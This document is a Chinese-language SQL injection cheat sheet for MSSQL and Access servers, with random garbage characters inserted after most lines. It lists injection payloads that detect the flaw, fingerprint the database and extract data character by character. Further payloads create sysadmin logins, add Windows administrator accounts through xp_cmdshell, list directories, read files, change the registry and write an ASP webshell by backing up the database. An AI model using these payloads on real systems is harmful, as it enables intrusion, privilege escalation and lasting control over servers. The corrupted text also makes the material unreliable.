1.判断是否有注入;and 1=1 ;and 1=2 �.]r��[0U�
2.初步判断是否是mssql ;and user>0 � ��M�?�}2
C,�tl��p�
3.注入参数是字符'and [查询条件] and ''='
>kC@7h5�)
��eWwSD#N#
4.搜索时没过滤参数的'and [查询条件] and '%25'=' kdxs�{�b"t
>#�!�n�"i;
5.判断数据库系统 �OE�4 2{?)
y;<jE�.7>
;and (select count(*) from sysobjects)>0 mssql ]~e�c]���Y
?�)]s�f�JG
;and (select count(*) from msysobjects)>0 access '�?3Hy|�}�
3D<P
[.bS
�2j��x""{
!29
Rl`9�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 xF�g=T�yq:
L�?al2aopF
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 } �k5p�fz
ld�9�zO�q�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �
��U,Z(h
��O~��q��B
9.(1)猜字段的ascii值(access) s)]|zu0"Ku
5n(p�1OM2q
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �_BR>- :Jr
s?0r\�cc|:
(2)猜字段的ascii值(mssql) Q�QC0u�ta`
�cG�"�jrQ�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 "G`)x+<~Z8
��vt�L�)�
10.测试权限结构(mssql) �)}p�aQmy#
Gc@�E�NE f
6� _7����3
P��i�cO3�m
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- UK�_2i(I"e
@Chj0wWZ>
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- "B�+M5B�0Z
-$e\m�]
}Z
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- !>>$'.nb@~
L
Q�;JtLu1
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- .'�X$SF`�
E"V|Plf
c
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �[�=V���8�
���{`�J7>K
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �\�;P Bx &
-Ep-v��4�}
;and 1=(select IS_MEMBER('db_owner'));-- ���?�5/S�a
dX+�D�E(y
�Q@d X��2
y�P-�.8�[;
11.添加mssql和系统的帐户 $]Fe9E�? �
jq�}�5(*k�
;exec master.dbo.sp_addlogin username;-- #�}k^g:�l1
;exec master.dbo.sp_password null,username,password;-- >a�a-i�x
&
N�|7�._AR2
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ;V�p&f%u+v
m4 4aK�qw)
;exec master.dbo.xp_cmdshell 'net user username password E"��u>&uPH
0D.�Y�O<PU
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- (F_�#L�eJ|
sn�j+-�'4T
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ����\��f��
z�&-3H/� �
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- @�x{�;a�9y
�A�>d*<#�x
NI�Ny�g"g<
I}?fy\1�A&
12.(1)遍历目录 �-�Tz�/ZOJ
�vL���kZ�C
;create table dirs(paths varchar(100), id int) �a<vC�AF�Q
-.z~u��/uL
;insert dirs exec master.dbo.xp_dirtree 'c:\' ��`D?vmS�Q
(a)d7y.o�o
;and (select top 1 paths from dirs)>0 kyY tL_�SD
;PLby]=��O
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �-ud!�j���
x>Q#B��v�y
2+ 9"�>a@�
>L=l{F6
p
(2)遍历目录 �Y|1kE��;�
2a��bWI�w4
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- d_]Mq�H>R\
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �>nTGvLOq
l�&�T;G�9z
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 n{UB^-}5�
�%X�p}�d5-
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 F!Sm�CE(0x
gy*�N)iv%�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 (�(���t8�
t@!oc"z}@�
{)�{i
O�Nd
8�[z�P2L!-
13.mssql中的存储过程 m3,]j���\�
A�:;KU����
xp_regenumvalues 注册表根键, 子键 &|�gn�%<�^
I�y`Zh@�"~
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 3�YRh�qp"E
gv<�9XYByt
xp_regread 根键,子键,键值名 x2�K.�5q�>
hE�E�b�H@b
;exec xp_regread ���*�=�r,V
'�MsxZqW"~
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 4pA(�.<#�A
5GpR�����N
xp_regwrite 根键,子键, 值名, 值类型, 值 �]A!Gr(FHQ
|yQ3H)q�B#
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 5N '
QG<jE
<$7*��y�V�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 c�
t,�p?[Q
>�Wy@J]Y#
xp_regdeletevalue 根键,子键,值名 I��URi90Ir
�K4l,�YR;r
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 t�;E�-9`N�
+�KD~/}C%-
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 u�^V`Ucd"R
�v�p-)�$f&
@gs
Kb*�,
sF�B�; /*C
14.mssql的backup创建webshell HM-�-`R�J�
$7�PFo�s%@
use model f3�*u_LO�
�#msk'MVt
create table cmd(str image); i}M&�1��E
P�VV�\@��
insert into cmd(str) values (''); i'�� ���N�
z!t��&zkAK
backup database model to disk='c:\l.asp'; n;�!t?jnf.
#nn�2o�dR�
�)/f�,.�Z$
}�4ta#T Ea
15.mssql内置函数 | F����:�?
)S>~�h���;
;and (select @@version)>0 获得Windows的版本号 B4&x?-0�ZC
�_�Rj�M .�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa [}d
3���u!
I_O�a<J\�+
;and (select user_name())>0 爆当前系统的连接用户 3�LX<&�."z
2<���Ub[R�
;and (select db_name())>0 得到当前连接的数据库 �L�4�2C�<�
2rD`]neA��
f*�kT7�PJG
[O(�78n$$�
16.简洁的webshell }&�;�0:hw%
�>�*Y~I�0>
use model �.$S`J�2Y
K+Eh�j(e�F
create table cmd(str image); d<: VoQM6M
�{v~&���.|
insert into cmd(str) values (''); 8a��e]tX5$
\+S~N:@><k
backup database model to disk='g:\wwwtest\l.asp';
